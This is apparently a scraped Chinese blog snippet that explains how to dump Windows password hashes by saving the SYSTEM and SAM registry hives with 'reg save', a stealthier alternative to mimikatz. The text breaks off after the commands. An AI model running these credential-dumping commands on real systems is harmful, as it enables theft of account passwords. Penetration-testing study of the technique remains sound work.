經過註冊表讀 Windows Hash 密碼

0x00 前言 在不容許上傳或者使用 mimikatz 時,能夠經過保存註冊表,到本地來讀 Windows Hash 密碼。這種方法更隱蔽,缺點是要解 Hash。code 0x01 操做 管理員權限下執行 cmd:blog reg save HKLM\SYSTEM D:\sys.hiv reg save HKLM\SAM D:\sam.hiv 執行完在 D 盤生成生成兩個文件cmd sys.hiv
相關文章
相關標籤/搜索